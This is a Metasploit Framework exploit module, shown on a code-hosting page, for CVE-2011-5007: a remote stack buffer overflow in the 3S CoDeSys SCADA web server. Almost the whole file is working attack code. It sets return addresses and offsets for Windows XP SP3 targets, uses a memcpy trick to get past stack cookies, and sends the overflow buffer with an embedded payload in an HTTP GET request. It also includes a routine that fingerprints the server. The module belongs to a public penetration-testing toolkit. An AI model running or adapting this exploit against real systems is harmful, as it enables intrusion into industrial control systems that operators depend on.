Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/codesys_web_server.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a remote stack buffer overflow vulnerability in

18
          3S-Smart Software Solutions product CoDeSys Scada Web Server Version

19
          1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and

20
          earlier.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'Luigi Auriemma', # Original discovery and poc

25
          'Celil UNUVER',

26
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit

27
          'sinn3r',

28
          'Michael Coppola'

29
        ],

30
        'References' => [

31
          [ 'CVE', '2011-5007'],

32
          [ 'OSVDB', '77387'],

33
          [ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],

34
          [ 'EDB', '18187' ],

35
          [ 'URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A' ],

36
          # The following clearifies why two people are credited for the discovery

37
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01']

38
        ],

39
        'DefaultOptions' => {

40
          'EXITFUNC' => 'process',

41
          'DisablePayloadHandler' => false

42
        },

43
        'Platform' => 'win',

44
        'Payload' => {

45
          'size' => 650,

46
          'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",

47
        },

48


49
        'Targets' => [

50
          [

51
            'CoDeSys v2.3 on Windows XP SP3',

52
            {

53
              'Ret' => 0x7E4456F7, # jmp esp user32

54
              'Offset' => 775

55
            }

56
          ],

57
          [

58
            'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',

59
            {

60
              # Abuse a memcpy() call to circumvent stack cookies

61
              'Offset' => 525,

62
              'Ret' => 0x02CDFD68,

63
              'Src' => 0x02CDFD58,

64
              'Dest' => 0x02CDFA14

65
            }

66
          ],

67
        ],

68
        'Privileged' => false,

69
        'DisclosureDate' => '2011-12-02',

70
        'Notes' => {

71
          'Reliability' => UNKNOWN_RELIABILITY,

72
          'Stability' => UNKNOWN_STABILITY,

73
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

74
        }

75
      )

76
    )

77


78
    register_options([Opt::RPORT(8080)])

79
  end

80


81
  def check

82
    connect

83
    sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")

84
    res = sock.get_once

85
    disconnect

86


87
    # Can't flag the web server as vulnerable, because it doesn't

88
    # give us a version

89
    vprint_line(res.to_s)

90
    if res.to_s =~ /3S_WebServer/

91
      return Exploit::CheckCode::Detected

92
    else

93
      return Exploit::CheckCode::Safe

94
    end

95
  end

96


97
  def exploit

98
    connect

99


100
    if target.name =~ /v2\.3/

101
      buffer = rand_text(target['Offset'])

102
      buffer << [target.ret].pack('V')

103
      buffer << make_nops(8)

104
      buffer << payload.encoded

105


106
    else

107
      # CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3

108
      buffer = rand_text_alphanumeric(target['Offset'])

109
      buffer << [target.ret].pack('V')

110
      buffer << [target['Src']].pack('V')

111
      buffer << [target['Dest']].pack('V')

112
      buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison

113
      buffer << make_nops(8)

114
      buffer << payload.encoded

115
      buffer << "\\a"

116
    end

117


118
    sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"

119


120
    print_status("Trying target #{target.name}...")

121
    sock.put(sploit)

122
    res = sock.get_once(-1, 5)

123
    print_line(res) unless res.nil?

124


125
    handler

126
    disconnect

127
  end

128
end

129


130
=begin

131
target.ret verified on:

132
- Win XP SP3 unpatched

133
- Win XP SP3 fully-patched

134
- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed

135
=end

136


137